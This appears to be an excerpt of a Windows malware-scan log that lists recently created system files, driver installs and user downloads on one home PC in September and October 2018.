2018-10-10 00:58 - 2018-09-08 02:42 - 000169984 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.XamlHost.dll
2018-10-10 00:58 - 2018-09-08 02:42 - 000114176 _____ (Microsoft Corporation) C:\WINDOWS\system32\bthci.dll
2018-10-10 00:58 - 2018-09-08 02:41 - 000258560 _____ (Microsoft Corporation) C:\WINDOWS\system32\SCardSvr.dll
2018-10-10 00:58 - 2018-09-08 02:40 - 001724928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Immersive.dll
2018-10-10 00:58 - 2018-09-08 02:40 - 000677888 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2018-10-10 00:58 - 2018-09-08 02:40 - 000593408 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptui.dll
2018-10-10 00:58 - 2018-09-08 02:40 - 000522240 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2018-10-10 00:58 - 2018-09-08 02:40 - 000402944 _____ (Microsoft Corporation) C:\WINDOWS\system32\bdesvc.dll
2018-10-10 00:58 - 2018-09-08 02:40 - 000249344 _____ (Microsoft Corporation) C:\WINDOWS\system32\bthprops.cpl
2018-10-10 00:58 - 2018-09-08 02:39 - 005505024 _____ (Microsoft Corporation) C:\WINDOWS\system32\aclui.dll
2018-10-10 00:58 - 2018-09-08 02:39 - 002052096 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_fs.dll
2018-10-10 00:58 - 2018-09-08 02:39 - 001787904 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_health.dll
2018-10-10 00:58 - 2018-09-08 02:39 - 000615936 _____ (Microsoft Corporation) C:\WINDOWS\system32\resutils.dll
2018-10-10 00:58 - 2018-09-08 02:38 - 001288192 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.Handlers.dll
2018-10-10 00:58 - 2018-09-08 02:38 - 001004544 _____ (Microsoft Corporation) C:\WINDOWS\system32\clusapi.dll
2018-10-10 00:58 - 2018-09-08 02:38 - 000986112 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcomm.dll
2018-10-10 00:58 - 2018-09-08 02:38 - 000882688 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmartcardCredentialProvider.dll
2018-10-10 00:58 - 2018-09-08 02:37 - 000091136 _____ (Microsoft Corporation) C:\WINDOWS\system32\mcbuilder.exe
2018-10-10 00:58 - 2018-09-08 02:16 - 000482080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\advapi32.dll
2018-10-10 00:58 - 2018-09-08 02:14 - 001328056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2018-10-10 00:58 - 2018-09-08 02:13 - 001626656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user32.dll
2018-10-10 00:58 - 2018-09-08 02:13 - 000181288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\basecsp.dll
2018-10-10 00:58 - 2018-09-08 02:03 - 000084992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\INETRES.dll
2018-10-10 00:58 - 2018-09-08 02:03 - 000059392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fdBth.dll
2018-10-10 00:58 - 2018-09-08 02:02 - 000236032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\scksp.dll
2018-10-10 00:58 - 2018-09-08 02:00 - 000548864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptui.dll
2018-10-10 00:58 - 2018-09-08 01:59 - 001530368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Immersive.dll
2018-10-10 00:58 - 2018-09-08 01:59 - 001452544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_fs.dll
2018-10-10 00:58 - 2018-09-08 01:59 - 000485376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\resutils.dll
2018-10-10 00:58 - 2018-09-08 01:59 - 000133632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.XamlHost.dll
2018-10-10 00:58 - 2018-09-08 01:58 - 001308672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_health.dll
2018-10-10 00:58 - 2018-09-08 01:58 - 000897536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll
2018-10-10 00:58 - 2018-09-08 01:58 - 000775680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\clusapi.dll
2018-10-10 00:58 - 2018-09-08 01:57 - 005391360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aclui.dll
2018-10-10 00:58 - 2018-09-08 01:57 - 000625664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SmartcardCredentialProvider.dll
2018-10-10 00:58 - 2018-09-08 01:57 - 000423936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2018-10-10 00:58 - 2018-09-08 01:57 - 000223744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bthprops.cpl
2018-10-10 00:58 - 2018-09-08 01:56 - 000080384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mcbuilder.exe
2018-10-10 00:58 - 2018-09-07 23:08 - 000462880 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll
2018-10-10 00:58 - 2018-09-07 22:59 - 000433664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rdbss.sys
2018-10-10 00:58 - 2018-09-07 22:59 - 000361544 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Storage.ApplicationData.dll
2018-10-10 00:58 - 2018-09-07 22:58 - 000744976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fvevol.sys
2018-10-10 00:58 - 2018-09-07 22:58 - 000368440 _____ (Microsoft Corporation) C:\WINDOWS\system32\thumbcache.dll
2018-10-10 00:58 - 2018-09-07 22:57 - 002571128 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2018-10-10 00:58 - 2018-09-07 22:57 - 001016984 _____ (Microsoft Corporation) C:\WINDOWS\system32\ucrtbase.dll
2018-10-10 00:58 - 2018-09-07 22:57 - 000930616 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2018-10-10 00:58 - 2018-09-07 22:57 - 000482384 _____ (Microsoft Corporation) C:\WINDOWS\system32\ucrtbase_enclave.dll
2018-10-10 00:58 - 2018-09-07 22:57 - 000368448 _____ (Microsoft Corporation) C:\WINDOWS\system32\sechost.dll
2018-10-10 00:58 - 2018-09-07 22:51 - 000380728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aepic.dll
2018-10-10 00:58 - 2018-09-07 22:45 - 000295416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\thumbcache.dll
2018-10-10 00:58 - 2018-09-07 22:45 - 000286824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Storage.ApplicationData.dll
2018-10-10 00:58 - 2018-09-07 22:44 - 001980984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2018-10-10 00:58 - 2018-09-07 22:44 - 000829752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe
2018-10-10 00:58 - 2018-09-07 22:43 - 001174448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ucrtbase.dll
2018-10-10 00:58 - 2018-09-07 22:43 - 000269104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sechost.dll
2018-10-10 00:58 - 2018-09-07 22:32 - 000025600 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\Dumpstorport.sys
2018-10-10 00:58 - 2018-09-07 22:31 - 000272384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Bluetooth.Proxy.dll
2018-10-10 00:58 - 2018-09-07 22:30 - 003601920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Bluetooth.Service.dll
2018-10-10 00:58 - 2018-09-07 22:30 - 000189440 _____ (Microsoft Corporation) C:\WINDOWS\system32\BluetoothApis.dll
2018-10-10 00:58 - 2018-09-07 22:30 - 000137728 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputLocaleManager.dll
2018-10-10 00:58 - 2018-09-07 22:30 - 000115200 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidbth.sys
2018-10-10 00:58 - 2018-09-07 22:30 - 000101888 _____ (Microsoft Corporation) C:\WINDOWS\system32\BthRadioMedia.dll
2018-10-10 00:58 - 2018-09-07 22:29 - 000241152 _____ (Microsoft Corporation) C:\WINDOWS\system32\HttpsDataSource.dll
2018-10-10 00:58 - 2018-09-07 22:29 - 000183808 _____ (Microsoft Corporation) C:\WINDOWS\system32\bthserv.dll
2018-10-10 00:58 - 2018-09-07 22:29 - 000174080 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhosdeployment.dll
2018-10-10 00:58 - 2018-09-07 22:28 - 000481280 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngccredprov.dll
2018-10-10 00:58 - 2018-09-07 22:28 - 000473088 _____ (Microsoft Corporation) C:\WINDOWS\system32\schannel.dll
2018-10-10 00:58 - 2018-09-07 22:28 - 000273408 _____ (Microsoft Corporation) C:\WINDOWS\system32\ubpm.dll
2018-10-10 00:58 - 2018-09-07 22:28 - 000265728 _____ (Microsoft Corporation) C:\WINDOWS\system32\psmsrv.dll
2018-10-10 00:58 - 2018-09-07 22:28 - 000153088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Microsoft.Bluetooth.Proxy.dll
2018-10-10 00:58 - 2018-09-07 22:27 - 000983040 _____ (Microsoft Corporation) C:\WINDOWS\system32\wbiosrvc.dll
2018-10-10 00:58 - 2018-09-07 22:27 - 000499200 _____ (Microsoft Corporation) C:\WINDOWS\system32\winipcfile.dll
2018-10-10 00:58 - 2018-09-07 22:27 - 000301056 _____ (Microsoft Corporation) C:\WINDOWS\system32\ProximityService.dll
2018-10-10 00:58 - 2018-09-07 22:27 - 000271872 _____ (Microsoft Corporation) C:\WINDOWS\system32\dafBth.dll
2018-10-10 00:58 - 2018-09-07 22:26 - 002328064 _____ (Microsoft Corporation) C:\WINDOWS\system32\winmsipc.dll
2018-10-10 00:58 - 2018-09-07 22:26 - 000784896 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngcsvc.dll
2018-10-10 00:58 - 2018-09-07 22:26 - 000471552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TileDataRepository.dll
2018-10-10 00:58 - 2018-09-07 22:26 - 000387584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ngccredprov.dll
2018-10-10 00:58 - 2018-09-07 22:26 - 000365568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2018-10-10 00:58 - 2018-09-07 22:26 - 000359424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winipcfile.dll
2018-10-10 00:58 - 2018-09-07 22:26 - 000142848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BluetoothApis.dll
2018-10-10 00:58 - 2018-09-07 22:25 - 003553792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll
2018-10-10 00:58 - 2018-09-07 22:25 - 002789376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msftedit.dll
2018-10-10 00:58 - 2018-09-07 22:25 - 000882688 _____ (Microsoft Corporation) C:\WINDOWS\system32\winipcsecproc.dll
2018-10-10 00:58 - 2018-09-07 22:25 - 000466432 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2018-10-10 00:58 - 2018-09-07 22:25 - 000415744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\schannel.dll
2018-10-10 00:58 - 2018-09-07 22:25 - 000341504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.Proximity.dll
2018-10-10 00:58 - 2018-09-07 22:24 - 000899072 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2018-10-10 00:58 - 2018-09-07 22:24 - 000845824 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2018-10-10 00:58 - 2018-09-07 22:24 - 000463360 _____ (Microsoft Corporation) C:\WINDOWS\system32\das.dll
2018-10-10 00:58 - 2018-09-07 22:23 - 001655296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winmsipc.dll
2018-10-10 00:58 - 2018-09-07 22:23 - 000807936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winipcsecproc.dll
2018-10-10 00:58 - 2018-09-07 22:23 - 000667136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fveapi.dll
2018-10-10 00:58 - 2018-09-07 22:23 - 000314368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.Proximity.dll
2018-10-10 00:58 - 2018-09-07 22:22 - 000778240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2018-10-09 20:06 - 2018-10-09 20:06 - 000039543 _____ C:\Users\Christopher&Gabriell\Desktop\dds.txt
2018-10-09 20:06 - 2018-10-09 20:06 - 000011388 _____ C:\Users\Christopher&Gabriell\Desktop\attach.txt
2018-10-09 20:03 - 2018-10-09 20:03 - 000688992 ____R (Swearware) C:\Users\Christopher&Gabriell\Downloads\dds.scr
2018-10-07 01:52 - 2018-10-07 01:56 - 000391779 _____ C:\Users\Christopher&Gabriell\Desktop\bookmark.htm
2018-10-07 01:36 - 2018-10-07 01:36 - 000000218 _____ C:\Users\Christopher&Gabriell\Favorites.URL
2018-10-07 01:27 - 2018-10-07 01:03 - 000731316 _____ C:\Users\Christopher&Gabriell\Desktop\cookies.txt
2018-10-06 22:16 - 2018-10-06 22:16 - 000015679 _____ C:\Users\Christopher&Gabriell\Documents\Oct 1st.xlsx
2018-10-06 21:52 - 2018-10-06 21:52 - 048105224 _____ (Microsoft Corporation) C:\Users\Christopher&Gabriell\Downloads\Windows-KB890830-x64-V5.64.exe
2018-10-06 02:26 - 2018-10-06 02:26 - 001510832 _____ (Ruiware) C:\Users\Christopher&Gabriell\Downloads\wpsetup.exe
2018-10-04 02:15 - 2018-10-06 02:46 - 000000000 ____D C:\ProgramData\InstallMate
2018-10-04 02:15 - 2018-10-04 02:15 - 000000000 ____D C:\Program Files (x86)\Ruiware
2018-10-04 02:13 - 2018-10-04 02:13 - 000000000 ____D C:\Users\Christopher&Gabriell\Downloads\WinPatrol PLUS v33.6.2015.18 Final + Keys [4realtorrentz]
2018-10-04 02:01 - 2018-10-04 02:01 - 001279026 _____ C:\Users\Christopher&Gabriell\Downloads\WinPatrol PLUS v33.6.2015.18 Final + Keys [4realtorrentz].zip
2018-10-01 06:19 - 2018-10-01 06:19 - 000690643 _____ C:\Users\Christopher&Gabriell\Documents\September_2018.pdf
2018-09-30 00:31 - 2018-09-30 00:31 - 000000000 ____D C:\WINDOWS\SysWOW64\wdegbma
2018-09-28 22:49 - 2018-09-28 22:49 - 000001134 _____ C:\Users\Christopher&Gabriell\Desktop\Snipping Tool.lnk
2018-09-28 22:49 - 2018-09-28 22:49 - 000001114 _____ C:\Users\Christopher&Gabriell\Desktop\Paint.lnk
2018-09-28 21:59 - 2018-10-01 07:26 - 000014750 _____ C:\Users\Christopher&Gabriell\Documents\9-2018.xlsx
2018-09-28 21:10 - 2018-09-28 21:10 - 000000000 ____D C:\Program Files (x86)\Microsoft ASP.NET
2018-09-28 14:23 - 2018-08-28 04:27 - 000097106 _____ C:\WINDOWS\uninstaller.dat
2018-09-27 23:42 - 2018-09-27 23:42 - 000001302 _____ C:\Users\Christopher&Gabriell\Desktop\Facebook Gameroom.lnk
2018-09-27 23:42 - 2018-09-27 23:42 - 000000000 ____D C:\Users\Christopher&Gabriell\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Facebook
2018-09-27 23:42 - 2018-09-27 23:42 - 000000000 ____D C:\Users\Christopher&Gabriell\AppData\Local\Facebook
2018-09-27 23:42 - 2018-09-27 23:42 - 000000000 ____D C:\Users\Christopher&Gabriell\AppData\Local\CEF
2018-09-25 01:22 - 2018-09-25 01:22 - 000000000 ____D C:\WINDOWS\Panther
2018-09-22 12:06 - 2018-09-22 12:06 - 000000000 ____D C:\Users\Public\CyberLink
2018-09-22 12:04 - 2018-09-22 12:04 - 000000000 ____D C:\Users\Christopher&Gabriell\AppData\Local\Cyberlink
2018-09-20 05:13 - 2012-08-19 21:45 - 001821184 _____ (IDT, Inc.) C:\WINDOWS\system32\IDTNC64.cpl
2018-09-20 05:12 - 2018-09-20 05:13 - 000000000 ____D C:\Program Files\IDT
2018-09-20 05:12 - 2012-08-19 21:45 - 002188800 _____ (IDT, Inc.) C:\WINDOWS\system32\stapo64.dll
2018-09-20 05:12 - 2012-08-19 21:45 - 000671744 ____N (IDT, Inc.) C:\WINDOWS\system32\stapi64.dll
2018-09-20 05:12 - 2012-08-19 21:45 - 000542208 _____ (IDT, Inc.) C:\WINDOWS\system32\Drivers\stwrt64.sys
2018-09-20 05:12 - 2012-08-19 21:45 - 000499200 _____ (IDT, Inc.) C:\WINDOWS\system32\stcplx64.dll
2018-09-20 05:12 - 2012-08-19 21:45 - 000255488 _____ (IDT, Inc.) C:\WINDOWS\system32\st646425.dll
2018-09-20 03:42 - 2018-09-20 03:42 - 000000000 ____D C:\Users\Christopher&Gabriell\AppData\Local\AppEx Networks
2018-09-20 03:42 - 2018-09-20 03:42 - 000000000 ____D C:\ProgramData\ATI
2018-09-20 03:37 - 2018-09-20 03:37 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Quick Stream
2018-09-20 03:37 - 2018-09-20 03:37 - 000000000 ____D C:\Program Files\AMD Quick Stream
2018-09-20 03:37 - 2018-09-20 03:37 - 000000000 ____D C:\Program Files (x86)\AMD AVT
2018-09-20 03:37 - 2014-08-08 01:31 - 000228032 _____ (AppEx Networks Corporation) C:\WINDOWS\system32\Drivers\appexDrv.sys
2018-09-20 03:36 - 2018-09-20 03:36 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Catalyst Control Center
2018-09-20 03:35 - 2018-09-20 03:36 - 000000000 ____D C:\Program Files\ATI Technologies
2018-09-20 03:23 - 2018-09-20 03:23 - 000000000 ____D C:\AMD
2018-09-20 02:10 - 2018-09-20 02:11 - 000000000 ____D C:\Users\Christopher&Gabriell\Downloads\HP Downloads
2018-09-20 01:09 - 2018-09-20 01:09 - 000001416 _____ C:\Users\Christopher&Gabriell\Desktop\cpuz_x64.exe - Shortcut.lnk
2018-09-17 00:57 - 2018-09-20 03:10 - 000000000 ____D C:\Users\Christopher&Gabriell\Downloads\Drivers for HP (8)
2018-09-17 00:53 - 2018-09-20 04:24 - 000000000 ____D C:\Users\Christopher&Gabriell\Downloads\Drivers for hp (8.1)
2018-09-16 23:35 - 2018-09-16 23:35 - 000000000 ____D C:\Users\Christopher&Gabriell\Downloads\cpu-z_1.86-en
2018-09-16 23:34 - 2018-09-16 23:34 - 002825318 _____ C:\Users\Christopher&Gabriell\Downloads\cpu-z_1.86-en.zip
2018-09-14 05:29 - 2018-09-14 06:09 - 000000000 ____D C:\T32768
2018-09-14 04:13 - 2018-09-14 04:13 - 000000000 ____D C:\Users\Christopher&Gabriell\AppData\Roaming\AMD
2018-09-14 03:39 - 2018-09-20 01:24 - 000000000 ____D C:\ProgramData\Package Cache
2018-09-14 03:38 - 2018-09-14 03:38 - 000001313 _____ C:\Users\Public\Desktop\SiSoftware Sandra Lite Titanium.RTMa.lnk
2018-09-14 03:38 - 2018-09-14 03:38 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SiSoftware
2018-09-14 03:38 - 2018-09-14 03:38 - 000000000 ____D C:\Program Files\SiSoftware
2018-09-14 03:32 - 2018-09-14 03:32 - 114365488 _____ (SiSoftware ) C:\Users\Christopher&Gabriell\Downloads\san2818.exe
2018-09-14 03:29 - 2018-09-14 03:29 - 002193584 _____ ( ) C:\Users\Christopher&Gabriell\Downloads\SiSoftware_Sandra_Lite_28.18.2018.5.exe
2018-09-14 03:17 - 2018-09-16 23:21 - 017190912 _____ C:\Users\Christopher&Gabriell\AppData\Roaming\Sandra.mdb
2018-09-14 03:17 - 2018-09-14 03:19 - 000000574 _____ C:\Users\Christopher&Gabriell\Documents\Sandra.ini
2018-09-12 04:47 - 2018-08-30 22:15 - 003392512 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll
2018-09-12 04:47 - 2018-08-30 22:14 - 002700288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll
2018-09-12 04:47 - 2018-08-30 22:13 - 002738688 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll
2018-09-12 04:47 - 2018-08-30 22:11 - 001854976 _____ (Microsoft Corporation) C:\WINDOWS\system32\wevtsvc.dll
2018-09-12 04:47 - 2018-08-30 22:09 - 002258944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll
2018-09-12 04:47 - 2018-08-28 02:17 - 023862784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Hydrogen.dll
2018-09-12 04:47 - 2018-08-28 01:48 - 001274368 _____ (Microsoft Corporation) C:\WINDOWS\system32\HoloSI.PCShell.dll
2018-09-12 04:47 - 2018-08-09 04:32 - 004527680 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppsvc.exe
2018-09-12 04:47 - 2018-08-09 04:31 - 001617728 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppobjs.dll
2018-09-12 04:47 - 2018-08-09 04:14 - 012709376 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2018-09-12 04:47 - 2018-08-09 03:24 - 011901952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2018-09-12 04:47 - 2018-08-08 23:29 - 001620880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2018-09-12 04:47 - 2018-08-08 23:23 - 003148288 _____ (Microsoft Corporation) C:\WINDOWS\system32\CertEnroll.dll
2018-09-12 04:47 - 2018-08-08 23:10 - 002893824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CertEnroll.dll
2018-09-12 04:46 - 2018-08-31 02:27 - 000178176 _____ (Microsoft Corporation) C:\WINDOWS\system32\t2embed.dll
2018-09-12 04:46 - 2018-08-31 02:27 - 000056320 _____ (Microsoft Corporation) C:\WINDOWS\system32\mf3216.dll
2018-09-12 04:46 - 2018-08-31 02:26 - 000101888 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bowser.sys
2018-09-12 04:46 - 2018-08-31 02:25 - 000270336 _____ (Microsoft Corporation) C:\WINDOWS\system32\spp.dll
2018-09-12 04:46 - 2018-08-31 02:25 - 000266752 _____ (Microsoft Corporation) C:\WINDOWS\system32\rstrui.exe
2018-09-12 04:46 - 2018-08-31 02:24 - 001127936 _____ (Microsoft Corporation) C:\WINDOWS\system32\nettrace.dll
2018-09-12 04:46 - 2018-08-31 02:24 - 000482304 _____ (Microsoft Corporation) C:\WINDOWS\system32\srcore.dll
2018-09-12 04:46 - 2018-08-31 02:23 - 000765440 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdh.dll
2018-09-12 04:46 - 2018-08-31 02:22 - 001661440 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll
2018-09-12 04:46 - 2018-08-31 01:41 - 000138752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\t2embed.dll
2018-09-12 04:46 - 2018-08-31 01:41 - 000043008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mf3216.dll
2018-09-12 04:46 - 2018-08-31 01:40 - 000216576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\spp.dll
2018-09-12 04:46 - 2018-08-31 01:37 - 000622080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdh.dll
2018-09-12 04:46 - 2018-08-31 01:36 - 001469952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll
2018-09-12 04:46 - 2018-08-30 22:43 - 000722880 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll
2018-09-12 04:46 - 2018-08-30 22:42 - 000632296 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpx.dll
2018-09-12 04:46 - 2018-08-30 22:42 - 000527328 _____ (Microsoft Corporation) C:\WINDOWS\system32\hal.dll
2018-09-12 04:46 - 2018-08-30 22:42 - 000155112 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32.dll
2018-09-12 04:46 - 2018-08-30 22:28 - 000453104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpx.dll
2018-09-12 04:46 - 2018-08-30 22:28 - 000134936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32.dll
2018-09-12 04:46 - 2018-08-30 22:17 - 000144384 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssprxy.dll
2018-09-12 04:46 - 2018-08-30 22:17 - 000020480 _____ (Microsoft Corporation) C:\WINDOWS\system32\netevent.dll
2018-09-12 04:46 - 2018-08-30 22:15 - 000395776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Search.ProtocolHandler.MAPI2.dll
2018-09-12 04:46 - 2018-08-30 22:15 - 000075776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mpsdrv.sys
2018-09-12 04:46 - 2018-08-30 22:14 - 000898560 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2018-09-12 04:46 - 2018-08-30 22:13 - 000402432 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ks.sys
2018-09-12 04:46 - 2018-08-30 22:12 - 000736256 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys
2018-09-12 04:46 - 2018-08-30 22:12 - 000020480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netevent.dll
2018-09-12 04:46 - 2018-08-30 22:11 - 001057792 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchIndexer.exe
2018-09-12 04:46 - 2018-08-30 22:11 - 000796672 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssvp.dll
2018-09-12 04:46 - 2018-08-30 22:11 - 000406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchProtocolHost.exe
2018-09-12 04:46 - 2018-08-30 22:10 - 000889344 _____ (Microsoft Corporation) C:\WINDOWS\system32\schedsvc.dll
2018-09-12 04:46 - 2018-08-30 22:10 - 000288768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Search.ProtocolHandler.MAPI2.dll
2018-09-12 04:46 - 2018-08-30 22:10 - 000176640 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssph.dll
2018-09-12 04:46 - 2018-08-30 22:08 - 000619520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2018-09-12 04:46 - 2018-08-30 22:07 - 000856064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchIndexer.exe
2018-09-12 04:46 - 2018-08-30 22:07 - 000735744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssvp.dll
2018-09-12 04:46 - 2018-08-30 22:06 - 000345088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchProtocolHost.exe
2018-09-12 04:46 - 2018-08-28 01:49 - 000677376 _____ (Microsoft Corporation) C:\WINDOWS\system32\HeadTrackerStorage.dll
2018-09-12 04:46 - 2018-08-28 01:45 - 000713216 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedRealitySvc.dll
2018-09-12 04:46 - 2018-08-13 21:14 - 001311744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msjet40.dll
2018-09-12 04:46 - 2018-08-13 21:14 - 000340480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msexcl40.dll
2018-09-12 04:46 - 2018-08-09 04:31 - 000766872 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicensingWinRT.dll
2018-09-12 04:46 - 2018-08-09 04:31 - 000253544 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppwinob.dll
2018-09-12 04:46 - 2018-08-09 04:31 - 000236624 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditionUpgradeManagerObj.dll
2018-09-12 04:46 - 2018-08-09 04:17 - 000064000 _____ (Microsoft Corporation) C:\WINDOWS\system32\iemigplugin.dll
2018-09-12 04:46 - 2018-08-09 04:14 - 000466944 _____ (Microsoft Corporation) C:\WINDOWS\system32\DscCore.dll
2018-09-12 04:46 - 2018-08-09 04:14 - 000326144 _____ (Microsoft Corporation) C:\WINDOWS\system32\CertEnrollUI.dll
2018-09-12 04:46 - 2018-08-09 04:14 - 000158720 _____ (Microsoft Corporation) C:\WINDOWS\system32\fdeploy.dll
2018-09-12 04:46 - 2018-08-09 04:13 - 000517120 _____ (Microsoft Corporation) C:\WINDOWS\system32\certreq.exe
2018-09-12 04:46 - 2018-08-09 04:13 - 000340992 _____ (Microsoft Corporation) C:\WINDOWS\system32\AcGenral.dll
2018-09-12 04:46 - 2018-08-09 04:13 - 000223232 _____ (Microsoft Corporation) C:\WINDOWS\system32\TtlsExt.dll
2018-09-12 04:46 - 2018-08-09 04:12 - 002084864 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2018-09-12 04:46 - 2018-08-09 04:12 - 000221184 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2018-09-12 04:46 - 2018-08-09 04:11 - 000181248 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditionUpgradeHelper.dll
